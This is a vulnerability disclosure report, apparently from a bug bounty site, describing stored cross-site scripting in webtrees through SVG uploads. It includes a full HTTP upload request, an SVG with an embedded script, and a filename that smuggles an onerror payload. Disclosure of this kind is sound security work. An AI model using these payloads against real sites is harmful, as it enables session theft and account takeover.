Cross-site Scripting (XSS) - Stored in fisharebest/webtrees
Valid
Reported on
Oct 8th 2021
Description
Stored XSS via upload file .svg allows for arbitrary execution of JavaScript
Proof of Concept
// PoC.req
POST /demo-dev/tree/demo/add-media-file/X9222 HTTP/2
Host: dev.webtrees.net
Cookie: __Secure-WT-ID=63trarcpiic93psog3t8okts4h
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://dev.webtrees.net/demo-dev/tree/demo/media/X9222/Princess-Victoria-of-Hesse-and-by-Rhine
Content-Type: multipart/form-data; boundary=---------------------------405026258827833307651807573856
Content-Length: 1752
Origin: https://dev.webtrees.net
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
-----------------------------405026258827833307651807573856
Content-Disposition: form-data; name="_csrf"
NktwFM88jQhclDtOWaJYcd0o77F8n5BI
-----------------------------405026258827833307651807573856
Content-Disposition: form-data; name="file_location"
upload
-----------------------------405026258827833307651807573856
Content-Disposition: form-data; name="file"; filename="xss'><img src=x onerror=alert(1)>.svg"
Content-Type: image/svg+xml
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert("Ghostlulz XSS");
</script>
</svg>
-----------------------------405026258827833307651807573856
Content-Disposition: form-data; name="auto"
0
-----------------------------405026258827833307651807573856
Content-Disposition: form-data; name="folder"
-----------------------------405026258827833307651807573856
Content-Disposition: form-data; name="new_file"
-----------------------------405026258827833307651807573856
Content-Disposition: form-data; name="unused"
0_Artémis_(Diane)_-_Galleria_dei_Candelabri_-_Vatican.JPG
-----------------------------405026258827833307651807573856
Content-Disposition: form-data; name="remote"
-----------------------------405026258827833307651807573856
Content-Disposition: form-data; name="title"
-----------------------------405026258827833307651807573856
Content-Disposition: form-data; name="type"
-----------------------------405026258827833307651807573856--
Step to Reproduct
Create a file .svg contain payload
Example
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert("Ghostlulz XSS");
</script>
</svg>
Goto details of a person. Example: https://dev.webtrees.net/demo-dev/tree/demo/media/X9222/Princess-Victoria-of-Hesse-and-by-Rhine
At Edit button choose to 'Add a media file'
Upload the file .svg and save it
The XSS will trigger when user click to file media. It will load file svg and trigger xss
Impact
This vulnerability has the potential to steal a user's cookie and gain unauthorized access to that user's account through the stolen cookie.
We have contacted a member of the
fisharebest/webtrees
team and are waiting to hear back
a year ago
to join this conversation